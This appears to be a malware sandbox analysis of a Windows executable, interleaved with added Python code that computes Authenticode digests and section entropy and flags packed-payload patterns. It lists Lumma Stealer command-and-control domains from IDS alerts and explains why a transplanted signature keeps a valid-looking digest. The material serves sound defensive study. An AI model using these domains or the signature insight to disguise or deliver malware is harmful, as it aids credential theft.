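def pe32_layout(pe: bytes):
    """Return (checksum_off, secdir_off, cert_off, cert_size) for a PE32 image."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    opt = e_lfanew + 4 + 20  # optional header follows the 20-byte COFF header
    if struct.unpack_from("<H", pe, opt)[0] != 0x10B:
        raise ValueError("only PE32 is handled here")
    secdir_off = opt + OPT_SECURITY_DIR_OFF
    cert_off, cert_size = struct.unpack_from("<II", pe, secdir_off)
    return opt + OPT_CHECKSUM_OFF, secdir_off, cert_off, cert_size

def authenticode_hash(pe: bytes, algo: str = "sha256") -> str:
    """Hash the image the way Authenticode does: skip CheckSum, the Security
    directory entry and the certificate table; hash the rest in file order
    (equal to the spec's section-sorted order when sections are in file order,
    which this helper assumes)."""
    checksum_off, secdir_off, cert_off, cert_size = pe32_layout(pe)
    skip = [(checksum_off, 4), (secdir_off, 8)]
    if cert_size:
        skip.append((cert_off, cert_size))
    h = hashlib.new(algo)
    pos = 0
    for start, length in sorted(skip):
        h.update(pe[pos:start])
        pos = start + length
    h.update(pe[pos:])
    return h.hexdigest()

def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte; 8.0 is the maximum."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def build_sample_pe32() -> bytes:
    """Constructed minimal PE32 (not fghj.exe): 0x200 of headers, one 0x200-byte
    .text section at 0x200, a 0x100-byte certificate table at 0x400."""
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)                    # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0x00, 0x10B)                   # PE32 magic
    struct.pack_into("<I", opt, 0x1C, 0x400000)                # ImageBase
    struct.pack_into("<I", opt, 0x3C, 0x200)                   # SizeOfHeaders
    struct.pack_into("<I", opt, OPT_CHECKSUM_OFF, 0xDEADBEEF)  # CheckSum
    struct.pack_into("<I", opt, 0x5C, 16)                      # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, OPT_SECURITY_DIR_OFF, 0x400, 0x100)
    section = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x200,
                          0, 0, 0, 0, 0x60000020)
    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + section).ljust(0x200, b"\0")
    return headers + bytes(range(256)) * 2 + b"\xAA" * 0x100   # .text data, then cert blob

def patched(pe: bytes, offset: int, new: bytes) -> bytes:
    """Copy of pe with new written at offset."""
    return pe[:offset] + new + pe[offset + len(new):]

if __name__ == "__main__":
    pe = build_sample_pe32()
    good = authenticode_hash(pe)            # the digest a valid signature would carry
    checksum_off, _, cert_off, _ = pe32_layout(pe)
    print("checksum rewritten, digest kept:", authenticode_hash(patched(pe, checksum_off, b"\0" * 4)) == good)
    print("cert blob swapped, digest kept: ", authenticode_hash(patched(pe, cert_off, b"\x55" * 0x100)) == good)
    print("one .text byte changed, kept:   ", authenticode_hash(patched(pe, 0x210, b"\xFF")) == good)
    print("report error number:", decode_hresult(-2146869232))
    print(".text entropy:", round(shannon_entropy(pe[0x200:0x400]), 3))
```

The point of the three patched variants is the one this report illustrates: a wrong PE checksum or a swapped-in certificate blob leaves the Authenticode digest untouched (which is why a transplanted signature can still be "present" and even chain to a real CA), but any change to the hashed bytes, such as a replaced icon resource or a repacked section, yields TRUST_E_BAD_DIGEST. For a real file, feed the bytes of the sample to authenticode_hash() and compare against the messageDigest attribute inside the PKCS#7 blob at the Security directory offset.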
Instruction
; Entry point (0x404503): four zero arguments and one call; the int3 that follows
; is non-returning-call padding, so the callee is expected to end the process.
xor eax, eax
push eax
push eax
push eax
push eax
call 00007F16247B3F29h
int3
; Thunk: calls the import at 0x40C034 with (0, arg) and passes its result to the
; import at 0x40C030.
push dword ptr [esp+04h]
push 00000000h
call dword ptr [0040C034h]
push eax
call dword ptr [0040C030h]
ret
; Same pattern, result passed to the import at 0x40C038 instead.
push dword ptr [esp+04h]
push 00000000h
call dword ptr [0040C034h]
push eax
call dword ptr [0040C038h]
ret
; Forward byte copy (memcpy-style): dst=[ebp+08h], src=[ebp+0Ch], n=[ebp+10h].
; ecx holds dst-src, so [ecx+eax] is the destination byte while eax walks src;
; returns dst in eax.
push ebp
mov ebp, esp
cmp dword ptr [ebp+10h], 00000000h
mov eax, dword ptr [ebp+0Ch]
je 00007F16247B4256h
mov ecx, dword ptr [ebp+08h]
sub ecx, eax
mov dl, byte ptr [eax]
dec dword ptr [ebp+10h]
mov byte ptr [ecx+eax], dl
inc eax
cmp dword ptr [ebp+10h], 00000000h
jne 00007F16247B4233h
mov eax, dword ptr [ebp+08h]
pop ebp
ret
jmp 00007F16247B421Bh
; Fill (memset-style): dst=[esp+04h], value=[esp+08h], n=[esp+0Ch]. The byte is
; replicated into a dword (imul by 0x01010101), n/4 dwords are written with
; rep stosd, and the remaining n&3 bytes are handled by code beyond this excerpt.
mov ecx, dword ptr [esp+0Ch]
test ecx, ecx
jbe 00007F16247B4265h
mov al, byte ptr [esp+08h]
movzx eax, al
imul eax, eax, 01010101h
mov edx, ecx
push ebx
push edi
mov edi, dword ptr [esp+0Ch]
shr ecx, 02h
rep stosd
mov ecx, edx
and ecx, 03h
                                                                                                                                                                                                                  rep stosb
                                                                                                                                                                                                                  pop edi
                                                                                                                                                                                                                  pop ebx
                                                                                                                                                                                                                  mov eax, dword ptr [esp+04h]
                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                  xor eax, eax
                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                  push ecx
                                                                                                                                                                                                                  fld dword ptr [esp+08h]
                                                                                                                                                                                                                  fistp dword ptr [esp]
                                                                                                                                                                                                                  mov eax, dword ptr [esp]
                                                                                                                                                                                                                  pop ecx
                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                                  push ecx
                                                                                                                                                                                                                  push ecx
                                                                                                                                                                                                                  and dword ptr [ebp-04h], 00000000h
                                                                                                                                                                                                                  lea eax, dword ptr [ebp-04h]
                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                  lea eax, dword ptr [ebp-08h]
                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                  push dword ptr [ebp+10h]
                                                                                                                                                                                                                  mov eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                  push dword ptr [ebp+14h]
                                                                                                                                                                                                                  mov dword ptr [ebp-08h], 00000004h
                                                                                                                                                                                                                  push dword ptr [ebp+0Ch]
                                                                                                                                                                                                                  call dword ptr [eax+18h]
                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                  Programming Language:
                                                                                                                                                                                                                  • [C++] VS2008 build 21022
                                                                                                                                                                                                                  • [IMP] VS2005 build 50727
                                                                                                                                                                                                                  • [C++] VS2008 SP1 build 30729
                                                                                                                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                  • [RES] VS2008 build 21022
                                                                                                                                                                                                                  • [LNK] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd738 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf000 | 0x2aebe9 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x30cc00 | 0x22f8 | .reloc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2be000 | 0x788 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xc0d0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xc000 | 0xc4 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xd14c | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xa067 | 0xa200 | f8cafe4e5965b03a55b286fd64196879 | False | 0.6324508101851852 | DOS executable (COM) | 6.648500706356357 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xc000 | 0x1b85 | 0x1c00 | b82428688c5f4f06f5cab197a37e821d | False | 0.4859095982142857 | data | 5.066779214622968 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xe000 | 0x11c | 0x200 | caf956c799a760ea86245ed9368e7bab | False | 0.3125 | firmware 7cad v4000 (revision 1923956736) D\317@ \302\255@, version 41900.16384.39340 (region 1756184576), 464338944 bytes or less, UNKNOWN1 0x68ad4000, UNKNOWN2 0xcbac4000, UNKNOWN3 0xfdac4000, at 0x25ad4000 799883264 bytes , at 0x39ad4000 1135427584 bytes , at 0xb7ac4000 2913746944 bytes | 2.288504814976975 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xf000 | 0x2aebe9 | 0x2aec00 | 840bfc4c49162cb76abecad83cb7b65e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x2be000 | 0x51c00 | 0x51c00 | 27cde34e4fa2c1189472cd3692a9ef3c | False | 0.9818096569189603 | data | 7.998453986481548 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
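The two tables above (the data directories with their "Is in Section" column, and the per-section MD5, ZLIB complexity and entropy listing) can be rebuilt from the NT headers alone, and the numbers they give for this sample are worth checking mechanically: a .reloc section of 0x51c00 bytes at entropy 7.998 and ZLIB complexity 0.98 is holding far more than the 0x788-byte base-relocation directory that is its only declared content. The Python below is an added example written for this page; it is not Joe Sandbox code and does not parse fghj.exe. It builds a small PE32 image in memory (a constructed layout with assumed section names, sizes and a placeholder WIN_CERTIFICATE overlay), maps each non-empty data directory to the section that holds it (IMAGE_DIRECTORY_ENTRY_SECURITY is looked up by file offset, since that entry is not an RVA), computes Shannon entropy and zlib ratio per section, and flags the packed-payload pattern seen in the report.

```python
"""Rebuild the 'Is in Section', 'Entropy' and 'ZLIB Complexity' columns of a PE data-directory
and section listing, and flag a packed-payload pattern. The PE image is constructed in memory."""
from collections import Counter
import hashlib, math, struct, zlib

DIRECTORY_NAMES = ["EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC", "DEBUG",
                   "COPYRIGHT", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT", "IAT",
                   "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED"]
IDX_SECURITY, IDX_BASERELOC = 4, 5
FILE_ALIGN, SECT_ALIGN = 0x200, 0x1000
_align = lambda n, a: (n + a - 1) // a * a

def shannon_entropy(buf):
    """Bits per byte, 0.0 to 8.0 (the 'Entropy' column)."""
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values()) if n else 0.0

def zlib_complexity(buf):
    """Compressed/raw size ratio (the 'ZLIB Complexity' column); about 1.0 means incompressible."""
    return len(zlib.compress(buf, 9)) / len(buf) if buf else 0.0

def build_test_pe():
    """Constructed PE32 (assumed layout, not the sample): repetitive .text, near-empty .data,
    a .reloc holding one tiny relocation block then opaque payload, plus an overlay certificate."""
    text = b"\x55\x8b\xec\x8b\x45\x08\x5d\xc3" * 64   # push ebp; mov ebp,esp; mov eax,[ebp+8]; pop ebp; ret
    data = b"\x00" * 0x100 + b"A" * 0x10
    reloc_dir_size, blob, seed = 0x40, b"", b"constructed payload"
    while len(blob) < 0x4000 - reloc_dir_size:        # deterministic pseudo-random bytes stand in for ciphertext
        seed = hashlib.sha256(seed).digest()
        blob += seed
    reloc = struct.pack("<II", SECT_ALIGN, reloc_dir_size).ljust(reloc_dir_size, b"\x00") + blob[:0x4000 - reloc_dir_size]
    bodies = [(b".text", text, 0x60000020), (b".data", data, 0xC0000040), (b".reloc", reloc, 0x42000040)]
    size_of_headers = _align(0x40 + 4 + 20 + 224 + 40 * len(bodies), FILE_ALIGN)
    headers, raw, va, ptr, reloc_va = [], b"", SECT_ALIGN, size_of_headers, 0
    for name, body, chars in bodies:
        raw_size = _align(len(body), FILE_ALIGN)
        headers.append(struct.pack("<8sIIIIIIHHI", name, len(body), va, raw_size, ptr, 0, 0, 0, 0, chars))
        raw += body.ljust(raw_size, b"\x00")
        reloc_va = va if name == b".reloc" else reloc_va
        va, ptr = va + _align(len(body), SECT_ALIGN), ptr + raw_size
    cert = struct.pack("<IHH", 0x100, 0x200, 2).ljust(0x100, b"\x00")   # WIN_CERTIFICATE placeholder
    dirs = [(0, 0)] * 16
    dirs[IDX_BASERELOC] = (reloc_va, reloc_dir_size)
    dirs[IDX_SECURITY] = (ptr, len(cert))                # SECURITY stores a file offset, not an RVA
    optional = (struct.pack("<HBB9I", 0x10B, 9, 0, len(text), 0, 0, SECT_ALIGN, SECT_ALIGN,
                            2 * SECT_ALIGN, 0x400000, SECT_ALIGN, FILE_ALIGN)
                + struct.pack("<6HIIIIHH4III", 4, 0, 0, 0, 4, 0, 0, va, size_of_headers, 0, 2, 0,
                              0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
                + b"".join(struct.pack("<II", a, s) for a, s in dirs))
    image = (b"MZ".ljust(0x3C, b"\x00") + struct.pack("<I", 0x40) + b"PE\0\0"
             + struct.pack("<HHIIIHH", 0x14C, len(bodies), 0, 0, 0, len(optional), 0x102)
             + optional + b"".join(headers)).ljust(size_of_headers, b"\x00")
    return image + raw + cert

def parse_pe(image):
    """Return (data directories, section descriptors) read from the NT headers."""
    pe = struct.unpack_from("<I", image, 0x3C)[0]
    if image[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    _, nsect, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, pe + 4)
    opt = pe + 24
    dir_off = opt + (96 if struct.unpack_from("<H", image, opt)[0] == 0x10B else 112)  # PE32 / PE32+
    ndirs = struct.unpack_from("<I", image, dir_off - 4)[0]
    dirs = [struct.unpack_from("<II", image, dir_off + 8 * i) for i in range(min(ndirs, 16))]
    sections = []
    for i in range(nsect):
        name, vsize, va, rsize, rptr = struct.unpack_from("<8sIIII", image, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize,
                         "raw_size": rsize, "raw_ptr": rptr, "data": image[rptr:rptr + rsize]})
    return dirs, sections

def home_section(sections, idx, value):
    """Section containing a directory ('Is in Section'); SECURITY is matched by file offset."""
    for s in sections:
        lo, span = ((s["raw_ptr"], s["raw_size"]) if idx == IDX_SECURITY
                    else (s["va"], max(s["vsize"], s["raw_size"])))
        if lo <= value < lo + span:
            return s["name"]
    return None                                           # header or overlay

def analyze(image, entropy_threshold=7.0):
    dirs, sections = parse_pe(image)
    report = {"directories": {}, "sections": {}, "findings": []}
    for idx, (value, size) in enumerate(dirs):
        if size:
            report["directories"][DIRECTORY_NAMES[idx]] = (value, size, home_section(sections, idx, value))
    for s in sections:
        ent = shannon_entropy(s["data"])
        report["sections"][s["name"]] = {"entropy": ent, "zlib": zlib_complexity(s["data"])}
        if ent > entropy_threshold:
            report["findings"].append(f"{s['name']}: entropy {ent:.2f} above {entropy_threshold}, packed or encrypted")
    base = report["directories"].get("BASERELOC")
    holder = next((s for s in sections if base and s["name"] == base[2]), None)
    if holder and holder["raw_size"] > 16 * base[1]:
        report["findings"].append(f"{holder['name']}: raw size 0x{holder['raw_size']:x} dwarfs its 0x{base[1]:x}-byte relocation block")
    sec = report["directories"].get("SECURITY")
    if sec and sec[2] is None:
        report["findings"].append("SECURITY: certificate sits in the overlay, outside every section")
    return report
```

Calling analyze(build_test_pe()) returns the directory-to-section map, per-section entropy and zlib ratio, and three findings for the constructed image. Applied to the figures in the table above, the same relocation rule fires: 0x51c00 bytes of near-incompressible data in a section that only needs 0x788 bytes of relocations is payload, not relocations. Two caveats when reading the report's columns: the File Type value is a content-sniffing guess over the raw section bytes, so "firmware ..." for a 0x11c-byte .data section and "DOS executable (COM)" for .text are artifacts of that guess rather than embedded files; and the SECURITY entry is a file offset, which is why a tool that treats it as an RVA will place the certificate in the wrong section or in none.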
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
IMG | 0xfa18 | 0x507 | Targa image data - RGB - RLE 13 x 33 x 24 | English | United States | 0.5532245532245532
TYPELIB | 0xff20 | 0x203c | data | English | United States | 0.428744546776539
RT_ICON | 0x11f5c | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Canada | 0.3683368869936034
RT_ICON | 0x12e04 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Canada | 0.4855595667870036
RT_ICON | 0x136ac | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Canada | 0.38078034682080925
RT_ICON | 0x13c14 | 0x3f10 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | Canada | 0.9837710604558969
RT_ICON | 0x17b24 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Canada | 0.27759336099585064
RT_ICON | 0x1a0cc | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Canada | 0.4017354596622889
RT_ICON | 0x1b174 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Canada | 0.6161347517730497
RT_STRING | 0x1b5dc | 0x26 | data | | | 0.47368421052631576
RT_STRING | 0x1b604 | 0x26 | data | Chinese | Taiwan | 0.47368421052631576
RT_STRING | 0x1b62c | 0x26 | data | Czech | Czech Republic | 0.47368421052631576
RT_STRING | 0x1b654 | 0x26 | data | German | Germany | 0.47368421052631576
RT_STRING | 0x1b67c | 0x26 | data | English | United States | 0.47368421052631576
RT_STRING | 0x1b6a4 | 0x26 | data | French | France | 0.47368421052631576
RT_STRING | 0x1b6cc | 0x26 | data | Italian | Italy | 0.47368421052631576
RT_STRING | 0x1b6f4 | 0x26 | data | Japanese | Japan | 0.47368421052631576
RT_STRING | 0x1b71c | 0x26 | data | Korean | North Korea | 0.47368421052631576
RT_STRING | 0x1b71c | 0x26 | data | Korean | South Korea | 0.47368421052631576
RT_STRING | 0x1b744 | 0x26 | data | Dutch | Netherlands | 0.47368421052631576
RT_STRING | 0x1b76c | 0x26 | data | Polish | Poland | 0.47368421052631576
RT_STRING | 0x1b794 | 0x26 | data | Portuguese | Brazil | 0.47368421052631576
RT_STRING | 0x1b7bc | 0x26 | data | Russian | Russia | 0.47368421052631576
RT_STRING | 0x1b7e4 | 0x26 | data | Turkish | Turkey | 0.47368421052631576
RT_STRING | 0x1b80c | 0x26 | data | Chinese | China | 0.47368421052631576
RT_STRING | 0x1b834 | 0x26 | data | | | 0.47368421052631576
RT_STRING | 0x1b85c | 0x86 | data | | | 0.6865671641791045
RT_STRING | 0x1b8e4 | 0x5e | data | Chinese | Taiwan | 0.7021276595744681
RT_STRING | 0x1b944 | 0x90 | data | Czech | Czech Republic | 0.6875
RT_STRING | 0x1b9d4 | 0x88 | data | German | Germany | 0.6691176470588235
RT_STRING | 0x1ba5c | 0x68 | data | English | United States | 0.6634615384615384
RT_STRING | 0x1bac4 | 0x8a | data | French | France | 0.6521739130434783
RT_STRING | 0x1bb50 | 0x90 | data | Italian | Italy | 0.6458333333333334
RT_STRING | 0x1bbe0 | 0x64 | data | Japanese | Japan | 0.71
RT_STRING | 0x1bc44 | 0x62 | data | Korean | North Korea | 0.7142857142857143
RT_STRING | 0x1bc44 | 0x62 | data | Korean | South Korea | 0.7142857142857143
RT_STRING | 0x1bca8 | 0x86 | data | Dutch | Netherlands | 0.6791044776119403
RT_STRING | 0x1bd30 | 0x7c | data | Polish | Poland | 0.6693548387096774
RT_STRING | 0x1bdac | 0x70 | data | Portuguese | Brazil | 0.6339285714285714
RT_STRING | 0x1be1c | 0x7c | data | Russian | Russia | 0.717741935483871
RT_STRING | 0x1be98 | 0x6c | data | Turkish | Turkey | 0.6851851851851852
RT_STRING | 0x1bf04 | 0x5e | data | Chinese | China | 0.7021276595744681
RT_STRING | 0x1bf64 | 0x88 | data | | | 0.6617647058823529
RT_STRING | 0x1bfec | 0x288 | Matlab v4 mat-file (little endian) k, numeric, rows 0, columns 0 | | | 0.39969135802469136
RT_STRING | 0x1c274 | 0xd0 | Matlab v4 mat-file (little endian) \335\210\013z\017_, numeric, rows 0, columns 0 | Chinese | Taiwan | 0.7836538461538461
RT_STRING | 0x1c344 | 0x25e | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | Czech | Czech Republic | 0.45874587458745875
RT_STRING | 0x1c5a4 | 0x33c | Matlab v4 mat-file (little endian) e, numeric, rows 0, columns 0 | German | Germany | 0.38164251207729466
RT_STRING | 0x1c8e0 | 0x254 | Matlab v4 mat-file (little endian) o, numeric, rows 0, columns 0 | English | United States | 0.4110738255033557
RT_STRING | 0x1cb34 | 0x2f6 | Matlab v4 mat-file (little endian) r, numeric, rows 0, columns 0 | French | France | 0.39841688654353563
RT_STRING | 0x1ce2c | 0x2e6 | Matlab v4 mat-file (little endian) r, numeric, rows 0, columns 0 | Italian | Italy | 0.3665768194070081
RT_STRING | 0x1d114 | 0x160 | Matlab v4 mat-file (little endian) \3630\2710\3100\3740\3510\3740L04x, numeric, rows 0, columns 0 | Japanese | Japan | 0.65625
RT_STRING | 0x1d274 | 0x160 | Matlab v4 mat-file (little endian) X\316 , numeric, rows 0, columns 0 | Korean | North Korea | 0.6846590909090909
RT_STRING | 0x1d274 | 0x160 | Matlab v4 mat-file (little endian) X\316 , numeric, rows 0, columns 0 | Korean | South Korea | 0.6846590909090909
RT_STRING | 0x1d3d4 | 0x2a0 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | Dutch | Netherlands | 0.4226190476190476
RT_STRING | 0x1d674 | 0x23a | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | Polish | Poland | 0.4421052631578947
RT_STRING | 0x1d8b0 | 0x226 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | Portuguese | Brazil | 0.42727272727272725
RT_STRING | 0x1dad8 | 0x274 | Matlab v4 mat-file (little endian) @\004>\0043\004@\0040\004<\004<\0040\004 , numeric, rows 0, columns 0 | Russian | Russia | 0.43630573248407645
RT_STRING | 0x1dd4c | 0x20a | Matlab v4 mat-file (little endian) \374, numeric, rows 0, columns 0 | Turkish | Turkey | 0.4521072796934866
                                                                                                                                                                                                                  RT_STRING0x1df580xd4Matlab v4 mat-file (little endian) \305\210\013z\217^\362]_cOW\0020\367\213\315\221\260e\013N}\217\0020, numeric, rows 0, columns 0ChineseChina0.7735849056603774
                                                                                                                                                                                                                  RT_STRING0x1e02c0x29cMatlab v4 mat-file (little endian) l, numeric, rows 0, columns 00.3787425149700599
                                                                                                                                                                                                                  RT_STRING0x1e2c80x38data0.6428571428571429
                                                                                                                                                                                                                  RT_STRING0x1e3000x38dataChineseTaiwan0.6428571428571429
                                                                                                                                                                                                                  RT_STRING0x1e3380x38dataCzechCzech Republic0.6428571428571429
                                                                                                                                                                                                                  RT_STRING0x1e3700x38dataGermanGermany0.6428571428571429
                                                                                                                                                                                                                  RT_STRING0x1e3a80x38dataEnglishUnited States0.6428571428571429
                                                                                                                                                                                                                  RT_STRING0x1e3e00x38dataFrenchFrance0.6428571428571429
                                                                                                                                                                                                                  RT_STRING0x1e4180x38dataItalianItaly0.6428571428571429
                                                                                                                                                                                                                  RT_STRING0x1e4500x38dataJapaneseJapan0.6428571428571429
                                                                                                                                                                                                                  RT_STRING0x1e4880x38dataKoreanNorth Korea0.6428571428571429
                                                                                                                                                                                                                  RT_STRING0x1e4880x38dataKoreanSouth Korea0.6428571428571429
                                                                                                                                                                                                                  RT_STRING0x1e4c00x38dataDutchNetherlands0.6428571428571429
                                                                                                                                                                                                                  RT_STRING0x1e4f80x38dataPolishPoland0.6428571428571429
                                                                                                                                                                                                                  RT_STRING0x1e5300x38dataPortugueseBrazil0.6428571428571429
                                                                                                                                                                                                                  RT_STRING0x1e5680x38dataRussianRussia0.6428571428571429
                                                                                                                                                                                                                  RT_STRING0x1e5a00x3adataTurkishTurkey0.6551724137931034
                                                                                                                                                                                                                  RT_STRING0x1e5dc0x38dataChineseChina0.6428571428571429
                                                                                                                                                                                                                  RT_STRING0x1e6140x38data0.6428571428571429
                                                                                                                                                                                                                  RT_RCDATA0x1e64c0x2a54edata1.0003518080627487
                                                                                                                                                                                                                  RT_RCDATA0x48b9c0x273b20data1.0003108978271484
                                                                                                                                                                                                                  RT_RCDATA0x2bc6bc0xf31data1.002828490614554
                                                                                                                                                                                                                  RT_GROUP_ICON0x2bd5f00x68dataEnglishCanada0.6730769230769231
                                                                                                                                                                                                                  RT_VERSION0x2bd6580x414dataEnglishUnited States0.3955938697318008
                                                                                                                                                                                                                  RT_MANIFEST0x2bda6c0x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
DLL | Import
KERNEL32.dll | GetLastError, CreateMutexW, CloseHandle, ExitProcess, GetEnvironmentVariableW, LocalFree, LocalAlloc, GetCurrentProcess, GetVersionExA, SetThreadLocale, GetCommandLineW, GetModuleHandleW, HeapAlloc, GetProcessHeap, HeapFree, ReleaseMutex, WaitForSingleObject, QueueUserAPC, SetWaitableTimer, ExitThread, CreateWaitableTimerW, CreateThread, FindResourceW, CreateDirectoryW, ReadFile, GetFileSize, CreateFileW, WriteFile, GetTempFileNameW, GetTempPathW, RemoveDirectoryW, DeleteFileW, FreeLibrary, FreeResource, LockResource, SizeofResource, LoadResource, LoadLibraryW, SetFilePointer, GetProcAddress, GetSystemDirectoryW, GetSystemTime, FindResourceA, OutputDebugStringW, LoadLibraryA, GetThreadLocale, InterlockedExchange, RaiseException
Language of compilation system | Country where language is spoken | Map
English | United States |
English | Canada |
Chinese | Taiwan |
Czech | Czech Republic |
German | Germany |
French | France |
Italian | Italy |
Japanese | Japan |
Korean | North Korea |
Korean | South Korea |
Dutch | Netherlands |
Polish | Poland |
Portuguese | Brazil |
Russian | Russia |
Turkish | Turkey |
Chinese | China |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-10T11:47:48.139606+0100 | 2058285 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spellshagey .biz) | 1 | 192.168.2.9 | 54554 | 1.1.1.1 | 53 | UDP
2025-01-10T11:47:48.152069+0100 | 2058222 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) | 1 | 192.168.2.9 | 52385 | 1.1.1.1 | 53 | UDP
2025-01-10T11:47:48.166347+0100 | 2058214 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) | 1 | 192.168.2.9 | 52857 | 1.1.1.1 | 53 | UDP
2025-01-10T11:47:48.180277+0100 | 2058220 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) | 1 | 192.168.2.9 | 59047 | 1.1.1.1 | 53 | UDP
2025-01-10T11:47:48.191793+0100 | 2058218 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) | 1 | 192.168.2.9 | 62657 | 1.1.1.1 | 53 | UDP
2025-01-10T11:47:48.202767+0100 | 2058216 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) | 1 | 192.168.2.9 | 54789 | 1.1.1.1 | 53 | UDP
2025-01-10T11:47:48.218852+0100 | 2058236 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) | 1 | 192.168.2.9 | 54826 | 1.1.1.1 | 53 | UDP
2025-01-10T11:47:48.229945+0100 | 2058210 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) | 1 | 192.168.2.9 | 53473 | 1.1.1.1 | 53 | UDP
2025-01-10T11:47:48.240914+0100 | 2058226 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) | 1 | 192.168.2.9 | 59999 | 1.1.1.1 | 53 | UDP
2025-01-10T11:47:48.921641+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49815 | 104.102.49.254 | 443 | TCP
2025-01-10T11:47:49.440994+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.9 | 49815 | 104.102.49.254 | 443 | TCP
